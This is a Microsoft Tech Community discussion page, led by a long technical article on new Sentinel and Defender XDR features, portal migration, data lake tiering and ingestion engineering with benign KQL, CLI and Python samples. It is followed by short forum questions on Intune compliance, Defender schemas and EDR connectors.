Recent Discussions
What’s New in Microsoft Sentinel and XDR: AI Automation, Data Lake Innovation, and Unified SecOps
The most consequential "new" Microsoft Sentinel / Defender XDR narrative for a deeply technical Microsoft Tech Community article is the operational and engineering shift to unified security operations in the Microsoft Defender portal, including an explicit Azure portal retirement/sunset timeline and concrete migration implications (data tiering, correlation-engine changes, schema differences, and automation behavior changes). Official sources now align on March 31, 2027 as the sunset date for managing Microsoft Sentinel in the Azure portal, with customers redirected to the Defender portal after that date.

The headline feature announcements to anchor your article around (because they create new engineering patterns, not just UI changes) are:

- AI playbook generator (preview): natural-language-driven authoring of Python playbooks in an embedded VS Code environment (Cline), using Integration Profiles for dynamic API calls and an Enhanced Alert Trigger for broader automation triggering across Microsoft Sentinel, Defender, and XDR alert sources.
- CCF Push (public preview): a push-based connector model built on the Azure Monitor Logs Ingestion API, where deploying via Content Hub can automate provisioning of the typical plumbing (DCR/DCE/app registration/RBAC), enabling near-real-time ingestion plus ingestion-time transformations and (per the announcement) direct delivery into certain system tables.
- Data lake tier ingestion for Advanced Hunting tables (GA): direct ingestion of specific Microsoft XDR Advanced Hunting tables into the Microsoft Sentinel data lake without requiring analytics-tier ingestion, explicitly positioned for long-retention, cost-effective storage and retrospective investigations at scale.
- Microsoft 365 Copilot data connector (public preview): ingests Copilot-related audit/activity events via the Purview Unified Audit Log feed into a dedicated table (CopilotActivity), with explicit admin-role requirements and cost notes.
- Multi-tenant content distribution expansion: adds support for distributing analytics rules, automation rules, workbooks, and built-in alert tuning rules across tenants via distribution profiles, with stated limitations (for example, automation rules that trigger a playbook cannot currently be distributed).
- Alert schema differences for "standalone vs XDR connector": a must-cite engineering artifact documenting breaking/behavioral differences (CompromisedEntity semantics, field mapping changes, alert filtering differences) when moving to the consolidated Defender XDR connector path.

What's new and when

Feature and release matrix

The table below consolidates officially documented Sentinel and Defender XDR features that are relevant to a "new announcements" technical article. If a source does not explicitly state GA/preview or a specific date, it is marked "unspecified."

| Feature | Concise description | Status (official) | Announcement / release date |
|---|---|---|---|
| Azure portal Sentinel retirement / redirection | Sentinel management experience shifts to the Defender portal; sunset date extended; post-sunset redirection expected | Date explicitly stated | Mar 31, 2027 sunset (date stated); extension published Jan 29, 2026 |
| Sentinel in Defender portal (core GA) | Sentinel is GA in the Defender portal, including for customers without Defender XDR/E5; unified SecOps surface | GA | Doc updated Sep 30, 2025; retirement note reiterated 2026 |
| AI playbook generator | Natural language → Python playbook, documentation, and a visual flow diagram; VS Code + Cline experience | Preview | Feb 23, 2026 |
| Integration Profiles (playbook generator) | Centralized configuration objects (base URL, auth method, credentials) used by generated playbooks to call external APIs dynamically | Preview feature component | Feb 23, 2026 |
| Enhanced Alert Trigger (generated playbooks) | Tenant-level trigger designed to target alerts across Sentinel + Defender + XDR sources and apply granular conditions | Preview feature component | Feb 23, 2026 |
| CCF Push | Push-based ingestion model that reduces setup friction (DCR/DCE/app reg/RBAC), built on the Logs Ingestion API; supports transformations and high-throughput ingestion | Public preview | Feb 12–13, 2026 |
| Legacy custom data collection API retirement | Retirement of the legacy custom data collection API as part of connector modernization | Retirement date stated | Sep 2026 (retirement) |
| Data lake tier ingestion for Microsoft XDR Advanced Hunting tables | Ingest selected Advanced Hunting tables from MDE/MDO/MDA directly into the Sentinel data lake; supports long retention and lake-first analytics | GA | Feb 10, 2026 |
| Microsoft 365 Copilot data connector | Ingests Copilot activities/audit logs; data lands in CopilotActivity; requires specific tenant roles to enable; costs apply | Public preview | Feb 3, 2026 |
| Multi-tenant content distribution: expanded content types | Adds support for analytics rules, automation rules, workbooks, and built-in alert tuning rules; includes limitations and prerequisites | Stated as "supported"; described as part of the public preview experience in the monthly update | Jan 29, 2026 |
| GKE dedicated connector | Dedicated connector built on CCF; ingests GKE cluster activity/workload/security events into GKEAudit; supports DCR transformations and lake-only ingestion | GA | Mar 4, 2026 |
| UEBA behaviors layer | "Who did what to whom" behavior abstraction from raw logs; newer sources state GA; other page sections still label Preview | GA and Preview labels appear in official sources (inconsistent) | Feb 2026 (GA statement) |
| UEBA widget in Defender portal home | Home-page widget to surface anomalous user behavior and accelerate workflows | Preview | Jan 2026 |
| Alert schema differences: standalone vs XDR connector | Documents field mapping differences, CompromisedEntity behavior changes, and alert filtering/scoping differences | Doc (behavioral/change reference) | Feb 4, 2026 (last updated) |
| Defender incident investigation: blast radius analysis | Graph visualization built on Sentinel data lake + graph for propagation-path analysis | Preview (per Defender XDR release notes) | Sep 2025 (release notes section) |
| Advanced hunting: hunting graph | Graph rendering of predefined threat scenarios in advanced hunting | Preview (per Defender XDR release notes) | Sep 2025 (release notes section) |
| Sentinel repositories API version retirement | "Call to action" to update API versions: older versions retire June 1, 2026; enforcement for Source Control actions starts June 15, 2026 | Dates explicitly stated | March 2026 (noticed); Jun 1 / Jun 15, 2026 (deadline/enforcement) |

Technical architecture and integrations

Unified reference architecture

Microsoft's official integration documentation describes two "centers of gravity" depending on how you operate:

- In Defender portal mode, Sentinel data is ingested alongside organizational data into the Defender portal, enabling SOC teams to analyze and respond from a unified surface.
- In Azure portal mode, Defender XDR incidents/alerts flow via Sentinel connectors and analysts work across both experiences.

Integration model: Defender suite and third-party security tools

The Defender XDR integration doc is explicit about:

- Supported Defender components whose alerts appear through the integration (Defender for Endpoint, Identity, Office 365, Cloud Apps), plus other services such as Purview DLP and Entra ID Protection.
- Behavior when onboarding Sentinel to the Defender portal with Defender XDR licensing: the Defender XDR connector is automatically set up and component alert-provider connectors are disconnected.
- Expected latency: Defender XDR incidents typically appear in the Sentinel UI/API within ~5 minutes, with additional lag before securityIncident ingestion is complete.
- Cost model: Defender XDR alerts and incidents that populate SecurityAlert / SecurityIncident are synchronized at no charge, while other data types (for example, Advanced Hunting tables) are charged.
For third-party tools, Microsoft's monthly "What's new" explicitly calls out new GA out-of-the-box connectors/solutions (examples include Mimecast audit logs, Vectra AI XDR, and Proofpoint POD email security) as part of an expanding connector ecosystem intended to unify visibility across cloud, SaaS, and on-premises environments.

Telemetry, schemas, analytics, automation, and APIs

Data flows and ingestion engineering

CCF Push and the "push connector" ingestion path

Microsoft's CCF Push announcement frames the "old" model as predominantly polling-based (Sentinel periodically fetching from partner/customer APIs) and introduces push-based connectors where partners/customers send data directly to a Sentinel workspace, emphasizing that "Deploy" can auto-provision the typical prerequisites: DCE, DCR, Entra app registration plus secrets, and RBAC assignments. Microsoft also states that CCF Push is built on the Logs Ingestion API, with benefits including throughput, ingestion-time transformation, and system-table targeting.

A precise engineering description of the underlying Logs Ingestion API components (useful for your article even if your readers never build a connector) is documented in Azure Monitor:

- The sender app authenticates via an app registration that has access to a DCR.
- The sender sends JSON matching the DCR's expected structure to a DCR endpoint or a DCE (a DCE is required for Private Link scenarios).
- The DCR can apply a transformation to map/filter/enrich records before writing to the target table.

DCR transformation (KQL)

Microsoft documents "transformations in Azure Monitor" and provides concrete sample KQL snippets for common needs such as cost reduction and enrichment.
// Keep only Critical events
source
| where severity == "Critical"

// Drop a noisy/unneeded column
source
| project-away RawData

// Enrich with a simple internal/external IP classification (example)
source
| extend IpLocation = iff(split(ClientIp, ".")[0] in ("10", "192"), "Internal", "External")

These are direct examples from Microsoft's sample transformations guidance; they are especially relevant because ingestion-time filtering is one of the primary levers for both performance and cost management in Sentinel pipelines. A Sentinel-specific nuance: Microsoft states that Sentinel-enabled Log Analytics workspaces are not subject to Azure Monitor's filtering ingestion charge, regardless of how much data a transformation filters (while other Azure Monitor transformation cost rules still apply in general).

Telemetry schemas and key tables you should call out

A "new announcements" article aimed at detection engineers should explicitly name the tables that are impacted by the new features:

- Copilot connector → CopilotActivity table, with a published list of record types (for example, CopilotInteraction and related plugin/workspace/prompt-book operations) and explicit role requirements to enable (Global Administrator or Security Administrator).
- Defender XDR incident/alert sync → SecurityAlert and SecurityIncident populated at no charge; other Defender data types (Advanced Hunting event tables such as DeviceInfo/EmailEvents) are charged.
- Sentinel onboarding to Defender advanced hunting: Sentinel alerts tied to incidents are ingested into AlertInfo and accessible in Advanced hunting; SecurityAlert is queryable even if not shown in the schema list in Defender (notable for KQL portability).
- UEBA "core" tables (engineering relevance: query joins and tuning): IdentityInfo, BehaviorAnalytics, UserPeerAnalytics, Anomalies.
- UEBA behaviors layer tables (new behavior abstraction): SentinelBehaviorInfo and SentinelBehaviorEntities, created only if the behaviors layer is enabled.
- Microsoft XDR Advanced Hunting lake-tier ingestion GA: explicitly supported tables from MDE/MDO/MDA (for example DeviceProcessEvents, DeviceNetworkEvents, EmailEvents, UrlClickEvents, CloudAppEvents) and an explicit note that MDI support will follow.

Detection and analytics: UEBA and graph

UEBA operating model and scoring

Microsoft's UEBA documentation gives you citeable technical detail:

- UEBA uses machine learning to build behavioral profiles and detect anomalies versus baselines, incorporating peer group analysis and "blast radius evaluation" concepts.
- Risk scoring is described with two different scoring models: BehaviorAnalytics.InvestigationPriority (0–10) vs Anomalies.AnomalyScore (0–1), with different processing characteristics (near-real-time/event-level vs batch/behavior-level).
- UEBA Essentials is positioned as a maintained pack of prebuilt queries (including multi-cloud anomaly detection), and Microsoft's February 2026 update adds detail about expanded anomaly detection across Azure/AWS/GCP/Okta and the anomalies-table-powered queries.

Sentinel data lake and graph as the new "analytics substrate"

Microsoft's data lake overview frames a two-tier model:

- Analytics tier: high-performance, real-time analytics supporting alerting and incident management.
- Data lake tier: centralized long-term storage for querying and Python-based analytics, designed for retention up to 12 years, with "single-copy" mirroring (data in the analytics tier is mirrored to the lake tier).

Microsoft's graph documentation states that if you already have Sentinel data lake, the required graph is auto-provisioned when you sign into the Defender portal, enabling experiences like hunting graph and blast radius. Microsoft also notes that while the experiences are included in existing licensing, enabling data sources can incur ingestion/processing/storage costs.
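The two UEBA scoring models described above use different ranges (InvestigationPriority 0–10, AnomalyScore 0–1), which complicates unified triage queries across tables. A minimal Python sketch of one way to rank them together; the rescaling and max-of-both convention here is a local assumption for illustration, not a Microsoft-documented formula:

```python
def unified_risk(investigation_priority=None, anomaly_score=None):
    """Map both documented score scales onto a common 0-1 range and
    return the higher, so either signal can raise triage priority.
    The combination rule is a local convention, not Microsoft's."""
    scores = []
    if investigation_priority is not None:
        scores.append(investigation_priority / 10.0)  # 0-10 scale
    if anomaly_score is not None:
        scores.append(anomaly_score)                  # already 0-1
    return max(scores) if scores else 0.0

# A behavior-level anomaly of 0.9 outranks an event-level priority of 8
high = unified_risk(investigation_priority=8, anomaly_score=0.9)
```

The same rescaling can be expressed in KQL at query time; prototyping it in Python first makes it easy to unit-test the ranking convention before embedding it in analytics rules.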
Automation: AI playbook generator details that matter technically

The playbook generator doc contains unusually concrete engineering constraints and required setup. Key technical points to carry into your article:

- Prerequisites: Security Copilot must be enabled with SCUs available (Microsoft states SCUs aren't billed for playbook generation but are required), and the Sentinel workspace must be onboarded to Defender.
- Roles: Sentinel Contributor is required for authoring automation rules, and a Detection tuning role in Entra is required to use the generator; permissions may take up to two hours to take effect.
- Integration Profiles: explicitly defined as base URL + auth method + required credentials; the API URL and auth method cannot be changed after creation; supports multiple auth methods including OAuth2 client credentials, API key, AWS auth, and Bearer/JWT.
- Enhanced Alert Trigger: designed for broader coverage across Sentinel, Defender, and XDR alerts and tenant-level automation consistency.
- Limitations: Python only, alerts as the sole input type, no external libraries, a maximum of 100 playbooks per tenant, a 10-minute runtime cap, line limits, and separation of enhanced-trigger rules from standard alert-trigger rules (no automatic migration).

APIs and code/CLI (official)

Create/update a DCR with Azure CLI (official)

Microsoft documents an az monitor data-collection rule create workflow to create/update a DCR from a JSON file, which is directly relevant if your readers build their own "push ingestion" paths outside of CCF Push or need transformations not supported via a guided connector UI.
az monitor data-collection rule create \
  --location 'eastus' \
  --resource-group 'my-resource-group' \
  --name 'my-dcr' \
  --rule-file 'C:\MyNewDCR.json' \
  --description 'This is my new DCR'

Send logs via the Azure Monitor Ingestion client (Python) (official)

Microsoft's Azure SDK documentation provides a straightforward LogsIngestionClient pattern (and the repo samples document the required environment variables such as the DCE, the DCR immutable ID, and the stream name).

import os

from azure.identity import DefaultAzureCredential
from azure.monitor.ingestion import LogsIngestionClient

endpoint = os.environ["DATA_COLLECTION_ENDPOINT"]
rule_id = os.environ["LOGS_DCR_RULE_ID"]          # DCR immutable ID
stream_name = os.environ["LOGS_DCR_STREAM_NAME"]  # stream name in the DCR

credential = DefaultAzureCredential()
client = LogsIngestionClient(endpoint=endpoint, credential=credential)

body = [
    {"Time": "2026-03-18T00:00:00Z", "Computer": "host1", "AdditionalContext": "example"}
]

client.upload(rule_id=rule_id, stream_name=stream_name, logs=body)

The repo sample and README explicitly define the environment variables and the use of LogsIngestionClient + DefaultAzureCredential.

Sentinel repositories API version retirement (engineering risk)

Microsoft's Sentinel release notes contain an explicit "call to action": older REST API versions used for Sentinel Repositories will be retired (June 1, 2026), and Source Control actions using older versions will stop being supported (starting June 15, 2026); Microsoft recommends migrating to specific versions. This is critical for "content-as-code" SOC engineering pipelines.

Migration and implementation guidance

Prerequisites and planning gates

A technically rigorous migration section should treat this as a set of gating checks.
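One gating check that lends itself to automation is the repositories API-version retirement noted above. A hedged Python sketch that scans pipeline or script text for api-version pins older than a cutoff; the cutoff value and the regex shape are illustrative assumptions, so check the official call-to-action for the actual retired versions and their replacements:

```python
import re

# ASSUMPTION for illustration: treat any api-version pinned before this
# ISO date as stale. Substitute the versions named in Microsoft's notice.
RETIRED_BEFORE = "2024-01-01"

def find_stale_api_versions(text):
    """Return api-version date values older than the assumed cutoff.
    ISO dates compare correctly as strings, so no date parsing needed."""
    versions = re.findall(r"api-version=(\d{4}-\d{2}-\d{2})", text)
    return sorted(v for v in versions if v < RETIRED_BEFORE)

pipeline = (
    "GET https://management.azure.com/.../sourcecontrols"
    "?api-version=2023-02-01"
)
stale = find_stale_api_versions(pipeline)
```

Running this across repository automation scripts before the June 2026 dates turns a release-notes warning into a CI check.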
Microsoft's transition guidance highlights several that can materially block or change behavior:

- Portal transition has no extra cost: Microsoft explicitly states that transitioning to the Defender portal has no extra cost (billing remains Sentinel consumption).
- Data storage and privacy policies change: after onboarding, Defender XDR policies apply even when working with Sentinel data (data retention/sharing differences).
- Customer-managed keys constraint for the data lake: CMK is not supported for data stored in the Sentinel data lake; more broadly, the data lake onboarding doc warns that CMK-enabled workspaces aren't accessible via data lake experiences and that data ingested into the lake is encrypted with Microsoft-managed keys.
- Region and data residency implications: the data lake is provisioned in the primary workspace's region, and onboarding may require consent to ingest Microsoft 365 data into that region if it differs.
- Data appearance lag when switching tiers: enabling ingestion for the first time or switching between tiers can take 90–120 minutes for data to appear in tables.

Step-by-step configuration tasks for the most "new" capabilities

Enable lake-tier ingestion for Advanced Hunting tables (GA)

Microsoft's GA announcement provides direct UI steps in the Defender portal:

1. Defender portal → Microsoft Sentinel → Configuration → Tables.
2. Select an Advanced Hunting table (from the supported list).
3. Data Retention Settings → choose "Data lake tier", set retention, and save.

Microsoft states that this keeps Defender data accessible in the Advanced Hunting table for 30 days while a copy is sent to the Sentinel data lake for long-term retention (up to 12 years) and graph/MCP-related scenarios.

Deploy the Microsoft 365 Copilot data connector (public preview)

Microsoft's connector post provides the operational steps and requirements:

- Install via Content Hub in the Defender portal (search "Copilot", install the solution, open the connector page).
- Enablement requires the tenant-level Global Administrator or Security Administrator role.
- Data lands in CopilotActivity.
- Ingestion costs apply based on Sentinel workspace settings or Sentinel data lake tier pricing.

Configure multi-tenant content distribution (expanded content types)

Microsoft documents:

- Navigate to "Content Distribution" in the Defender multi-tenant management portal.
- Create or select a distribution profile; choose content types; select content; choose up to 100 workspaces per tenant; save and monitor sync results.
- Limitations: automation rules that trigger a playbook cannot currently be distributed; alert tuning rules are limited to built-in rules (for now).
- Prerequisites: access to more than one tenant via delegated access; a subscription to Microsoft 365 E5 or Office E5.

Prepare for Defender XDR connector-driven changes

Microsoft explicitly warns that incident creation rules are turned off for Defender XDR-integrated products to avoid duplicates and suggests compensating controls using Defender portal alert tuning or automation rules. It also warns that incident titles will be governed by Defender XDR correlation and recommends avoiding "incident name" conditions in automation rules (tags are recommended instead).

Common pitfalls and "what breaks"

A strong engineering article should include a "what breaks" section, grounded in Microsoft's own lists:

- Schema and field semantics drift: the "standalone vs XDR connector" schema differences doc calls out CompromisedEntity behavior differences, field mapping changes, and alert filtering differences (for example, Defender for Cloud informational alerts are not ingested; Entra ID alerts below High are not ingested by default).
- Automation delays and unsupported actions post-onboarding: transition guidance states automation rules might run up to 10 minutes after alert/incident changes due to forwarding, and that some playbook actions (like adding/removing alerts from incidents) are not supported after onboarding, breaking certain playbook patterns.
- Incident synchronization boundaries: incidents created in Sentinel via API, Logic App playbook, or manually in the Azure portal aren't synchronized to the Defender portal (per the transition doc).
- Advanced hunting differences after data lake enablement: auxiliary log tables are no longer available in Defender Advanced hunting once the data lake is enabled; they must be accessed via the data lake exploration KQL experiences.
- CI/CD failures from API retirement: repository connection create/manage tooling that calls older API versions must migrate by June 1, 2026 to avoid action failures.

Performance and cost considerations

Microsoft's cost model is now best explained using tiering and retention:

- The Sentinel data lake tier is designed for cost-effective long retention up to 12 years, with analytics-tier data mirrored to the lake tier as a single copy.
- For Defender XDR threat hunting data, Microsoft states it is available in the analytics tier for 30 days by default; retaining beyond that and moving beyond free windows drives ingestion and/or storage costs, depending on whether you extend analytics retention or store longer in the lake tier.
- Ingesting data directly to the data lake tier incurs ingestion, storage, and processing costs; retaining data in the lake beyond analytics retention incurs storage costs.
- Ingestion-time transformations are a first-class cost lever, and Microsoft explicitly frames filtering as a way to reduce ingestion costs in Log Analytics.
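The tiering tradeoff is easy to quantify once you plug in your own rates. A back-of-envelope Python sketch; the per-GB-month rates below are placeholders, not Microsoft pricing, so substitute the figures from your region's price sheet:

```python
# PLACEHOLDER rates for illustration only -- substitute your region's
# actual extended-analytics-retention and lake-storage pricing.
ANALYTICS_PER_GB_MONTH = 0.10  # assumed extended analytics retention rate
LAKE_PER_GB_MONTH = 0.02       # assumed lake-tier storage rate

def monthly_retention_cost(gb, months, tier):
    """Total storage cost of keeping `gb` of data for `months` months."""
    rate = ANALYTICS_PER_GB_MONTH if tier == "analytics" else LAKE_PER_GB_MONTH
    return gb * months * rate

# Compare keeping 500 GB for 24 months in each tier
analytics_cost = monthly_retention_cost(500, 24, "analytics")
lake_cost = monthly_retention_cost(500, 24, "lake")
```

Even a rough model like this makes the "move long-retention data to the lake tier" decision concrete when planning retention policies per table.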
Sample deployment checklist

| Phase | Task | Acceptance criteria (engineering) |
|---|---|---|
| Governance | Confirm target portal strategy and dates | Internal cutover plan aligns with the March 31, 2027 retirement; CI/CD deadlines tracked |
| Identity/RBAC | Validate roles for onboarding + automation | Required Entra roles + Sentinel roles assigned; propagation delays accounted for |
| Data lake readiness | Decide whether to onboard to Sentinel data lake | CMK policy alignment confirmed; billing subscription owner identified; region implications reviewed |
| Defender XDR integration | Choose integration mode and test incident sync | Incidents visible within expected latency; bi-directional sync fields behave as expected |
| Schema regression | Validate queries/rules against XDR connector schema | KQL regression tests pass; CompromisedEntity and filtering changes handled |
| Connector modernization | Inventory connectors; plan CCF / CCF Push transitions | Function-based connector migration plan; legacy custom data collection API retirement addressed |
| Automation | Pilot AI playbook generator + enhanced triggers | Integration Profiles created; generated playbooks reviewed; enhanced trigger scopes correct |
| Multi-tenant operations | Configure content distribution if needed | Distribution profiles sync reliably; limitations documented; rollback/override plan exists |
| Outage-proofing | Update Sentinel repos tooling for API retirement | All source-control actions use recommended API versions before June 1, 2026 |

Use cases and customer impact

Detection and response scenarios that map to the new announcements

Copilot governance and misuse detection

The Copilot connector's published record types enable detections for scenarios such as unauthorized plugin/workspace/prompt-book operations and anomalous Copilot interactions. The data is explicitly positioned for analytics rules, workbooks, automation, and threat hunting within Sentinel and the Sentinel data lake.
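A minimal offline triage sketch for that Copilot scenario, in Python. The record-type names and field names (RecordType, UserId) are illustrative assumptions, not the published CopilotActivity schema; verify them against the actual table before building a detection:

```python
# ASSUMED record types and field names for illustration -- check the
# published CopilotActivity record-type list before relying on these.
SENSITIVE_OPS = {"PluginInstalled", "PromptBookModified"}

def flag_sensitive_copilot_ops(rows, allowed_admins):
    """Flag sensitive Copilot operations performed by non-admin users."""
    return [
        r for r in rows
        if r.get("RecordType") in SENSITIVE_OPS
        and r.get("UserId") not in allowed_admins
    ]

rows = [
    {"RecordType": "PluginInstalled", "UserId": "user@contoso.com"},
    {"RecordType": "CopilotInteraction", "UserId": "user@contoso.com"},
    {"RecordType": "PluginInstalled", "UserId": "admin@contoso.com"},
]
hits = flag_sensitive_copilot_ops(rows, allowed_admins={"admin@contoso.com"})
```

In production the same logic would live in a KQL analytics rule over CopilotActivity; the Python form is useful for unit-testing the allow-list convention.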
Long-retention hunting on high-volume Defender telemetry (lake-first approach)

Lake-tier ingestion for Advanced Hunting tables (GA) is explicitly framed around scale, cost containment, and retrospective investigations beyond "near-real-time" windows, while keeping 30-day availability in the Advanced Hunting tables themselves.

Faster automation authoring and customization (SOAR engineering productivity)

Microsoft positions the playbook generator as eliminating rigid templates and enabling dynamic API calls across Microsoft and third-party tools via Integration Profiles, with preview-customer feedback claiming faster automation development (vendor-stated).

Multi-tenant SOC standardization (MSSP / large enterprise)

Multi-tenant content distribution is explicitly designed to replicate detections, automation, and dashboards across tenants, reducing drift and accelerating onboarding, while keeping execution local to the target tenants.

Measurable benefit dimensions (how to discuss rigorously)

Most Microsoft sources in this announcement set are descriptive (not benchmark studies). A rigorous article should therefore describe what you can measure, and label any numeric claims as vendor-stated. Recommended measurable dimensions grounded in the features as documented:

- Time-to-detect / time-to-ingest: CCF Push is positioned as real-time, event-driven delivery vs polling-based ingestion.
- Time-to-triage / time-to-investigate: UEBA layers (Anomalies + Behaviors) are designed to summarize and prioritize activity, with explicit scoring models and tables for query enrichment.
- Incident queue pressure: Defender XDR grouping/enrichment is explicitly described as reducing SOC queue size and time to resolve.
- Cost-per-retained-GB and query cost: tiering rules and retention windows define cost tradeoffs; ingestion-time transformations reduce cost by dropping unneeded rows and columns.
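Time-to-ingest is the easiest of these dimensions to measure empirically: export pairs of event time and ingestion time from the workspace and compute lag percentiles. A hedged Python sketch using synthetic timestamps; in practice the pairs would come from something like TimeGenerated vs ingestion_time() in an exported query result:

```python
from datetime import datetime, timedelta
from statistics import quantiles

def lag_minutes(event_times, ingest_times):
    """Per-event ingestion lag in minutes for paired timestamps."""
    return [
        (ingested - generated).total_seconds() / 60.0
        for generated, ingested in zip(event_times, ingest_times)
    ]

# Synthetic data standing in for an exported (TimeGenerated, ingestion_time) set
base = datetime(2026, 3, 1)
events = [base + timedelta(minutes=m) for m in range(10)]
ingests = [t + timedelta(minutes=2 + (i % 3)) for i, t in enumerate(events)]

lags = lag_minutes(events, ingests)
p95 = quantiles(lags, n=20, method="inclusive")[-1]  # 95th percentile
```

Tracking p50/p95 lag per connector before and after a CCF Push migration turns the "real-time vs polling" claim into a measurable delta.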
Vendor-stated metrics: Microsoft's March 2026 "What's new" roundup references an external buyer's guide and reports a "44% reduction in total cost of ownership" and "93% faster deployment times" as outcomes for organizations using Sentinel (treat these as vendor marketing unless corroborated by an independent study in your environment).

Comparison of old vs new Microsoft capabilities and competitor XDR positioning

Old vs new (Microsoft)

| Capability | "Older" operating model (common patterns implied by docs) | "New" model emphasized in announcements/release notes |
|---|---|---|
| Primary SOC console | Split experience (Azure portal Sentinel + Defender portal XDR) | Defender portal as the primary unified SecOps surface; Azure portal sunset |
| Incident correlation engine | Sentinel correlation features (e.g., Fusion in the Azure portal) | Defender XDR correlation engine replaces Fusion for incident creation after onboarding; incident provider is always "Microsoft XDR" in Defender portal mode |
| Automation authoring | Logic Apps playbooks + automation rules | Adds AI playbook generator (Python) + Enhanced Alert Trigger, with explicit constraints/limits |
| Custom ingestion | Data Collector API legacy patterns + manual DCR/DCE plumbing | CCF Push built on the Logs Ingestion API; emphasizes automated provisioning and transformation support |
| Long retention | Primarily analytics-tier retention strategies | Data lake tier supports up to 12 years; lake-tier ingestion for AH tables GA; explicit tier/cost model |
| Graph-driven investigations | Basic incident graphs | Blast radius analysis + hunting graph experiences built on Sentinel data lake + graph |

Competitor XDR offerings (high-level, vendor pages)

The table below is intentionally high-level and marks details as unspecified unless explicitly stated on the cited vendor pages.

| Vendor | Positioning claims (from official vendor pages) | Notes / unspecified items |
|---|---|---|
| CrowdStrike | Falcon Insight XDR is positioned as "AI-native XDR" for "endpoint and beyond," emphasizing detection/response and threat intelligence. | Data lake architecture, ingestion transformation model, and multi-tenant content distribution specifics are unspecified in cited sources. |
| Palo Alto Networks | Cortex XDR is positioned as integrated endpoint security with AI-driven operations and broader visibility; the vendor site highlights outcome metrics in customer stories and "AI-driven endpoint security." | Lake/graph primitives, connector framework model, and schema parity details are unspecified in cited sources. |
| SentinelOne | Singularity XDR is positioned as AI-powered response with automated workflows across the environment; emphasizes machine-speed incident response. | Specific SIEM-style retention tiering and documented ingestion-time transformations are unspecified in cited sources. |

Intune device compliance status not evaluated
Has anyone encountered devices taking absolutely forever to evaluate overall compliance after the user-enrollment ESP (pre-provisioned devices)? They just sit there in "not evaluated" and get blocked by CA policy. Most come good eventually, but some are literally taking employees offline for the whole day. These are all Win11 AAD-joined. Microsoft has only offered me the standard "may take up to 8 hours, goodbye" response, but I am pulling my hair out trying to figure out if this is just an Intune thing, or is there a trick I am missing? Some of them take so long that I give up and swap out the device so they can start working. The individual policies are evaluating just fine, but the overall status is way behind. I'd even prefer them to be non-compliant because at least then the grace period would kick in. I have had very limited success with rebooting and kicking off all the syncs / check access buttons, but I have a feeling those buttons have just been a placebo. It happens very sporadically too; on about half of devices the user doesn't even notice, it's that quick. Thanks for any advice.

Why is there no signature status for the new process in the DeviceProcessEvents table?
According to the schema, there is only a field for checking the initiating (parent) process's digital signature, named InitiatingProcessSignatureStatus. So we have information on whether the process that initiated the execution is signed. However, in many security use cases it is important to know whether the spawned (child) process is digitally signed. Let's assume that Winword.exe (signed) executed an unsigned binary; this is definitely a different situation than Winword.exe executing some signed binary (although both may be suspicious, or legitimate). I feel that some valuable information is not provided, and I'd like to know the reason. Is it related to logging performance? Or some memory structures that are present only for the already-existing process?

Roadmap for TVM network devices?
I see that agent-based scanning for network devices is being deprecated for Defender TVM in November this year. It's not clear what the replacement solution will be. While the product support is not exhaustive, for perimeter devices, getting TVM information as part of the Defender for Cloud for Servers license is a valuable addition. Is there any roadmap information, or documentation that outlines how we'll be able to achieve the same outcome of TVM information for network devices for weaknesses and threats? I've been looking but cannot find a clear direction on this, or on whether I'll need to start looking at third party for TVM on network devices.

Integrate Defender for Cloud Apps w/ Azure Firewall or VPN Gateway
Hello, recently I have been tasked with securing our OpenAI implementation. I would like to marry Defender for Cloud Apps' sanctioning feature with the blocking of unsanctioned traffic, like the Defender for Endpoint capability. To do this, I was only able to come up with: creating a Windows 2019/2022 server with RRAS and two interfaces in Azure, one public and one private. Then I add Defender for Endpoint, optimized to act as a traffic moderator, and integrate the solution with Defender for Cloud Apps with block integration enabled. I can then sanction each of the desired applications, closing my environment and only allowing sanctioned traffic to sanctioned locations. This solution seemed difficult to create, was not the best performer, and didn't really account for the router's ability to differentiate which solution was originating the traffic, which would allow for selective profiles depending on the originating source. Are there any plans to have similar solutions available in the future from the VPN gateway (integration with Defender for Cloud Apps), or Azure Firewall with an advanced profile? The compliance interface with the traffic-sanctioning feature seems very straightforward.

Endpoint and EDR Ecosystem Connectors in Microsoft Sentinel
Most SOCs operate in mixed endpoint environments. Even if Microsoft Defender for Endpoint is your primary EDR, you may still run Cisco Secure Endpoint, WithSecure Elements, Knox, or Lookout in specific regions, subsidiaries, mobile fleets, or regulatory enclaves. The goal is not to replace any tool, but to standardize how signals become detections and response actions. This article explains an engineering-first approach: ingestion correctness, schema normalization, entity mapping, incident merging, and cross-platform response orchestration.

Think of these connectors as four different lenses on endpoint risk. Two provide classic EDR detections (Cisco, WithSecure). Two provide mobile security and posture signals (Knox, Lookout). The highest-fidelity outcomes come from correlating them with Microsoft signals (Defender for Endpoint device telemetry, Entra ID sign-ins, and threat intelligence).

Cisco Secure Endpoint
Typical signal types include malware detections, exploit prevention events, retrospective detections, device isolation actions, and file/trajectory context. Cisco telemetry is often hash-centric (SHA256, file reputation), which makes it excellent for IOC matching and cross-EDR correlation.

WithSecure Elements
WithSecure Elements tends to provide strong behavioral detections and ransomware heuristics, often including process ancestry and behavioral classification. It complements hash-based detections by providing behavior and incident context that can be joined to Defender process events.

Samsung Knox Asset Intelligence
Knox is posture-heavy. Typical signals include compliance state, encryption status, root/jailbreak indicators, patch level, device model identifiers, and policy violations. This data is extremely useful for identity correlation: it helps answer whether a successful sign-in came from a device that should be trusted.
Lookout Mobile Threat Defense
Lookout focuses on mobile threats such as malicious apps, phishing, risky networks (MITM), device compromise indicators, and risk scores. Lookout signals are critical for identity attack chains because mobile phishing is often the precursor to token theft or credential reuse.

2. Ingestion architecture: from vendor API to Sentinel tables
Most third-party connectors are API-based. In production, treat ingestion as a pipeline with reliability requirements. The standard pattern is vendor API → connector runtime (codeless connector or Azure Function) → DCE → DCR transform → Log Analytics table. Key engineering controls:
Secrets and tokens should be stored in Azure Key Vault where supported; rotate and monitor auth failures.
Use overlap windows (poll slightly more than the schedule interval) and deduplicate by stable event IDs.
Use DCR transforms to normalize fields early (device/user/IP/severity) and to filter obviously low-value noise.
Monitor connector health and ingestion lag; do not rely on 'Connected' status alone.

Ingestion health checks (KQL)

// Freshness & lag per connector table (adapt table names to your workspace)
let lookback = 24h;
union isfuzzy=true
    (<CiscoTable> | extend Source="Cisco"),
    (<WithSecureTable> | extend Source="WithSecure"),
    (<KnoxTable> | extend Source="Knox"),
    (<LookoutTable> | extend Source="Lookout")
| where TimeGenerated > ago(lookback)
| summarize LastEvent=max(TimeGenerated), Events=count() by Source
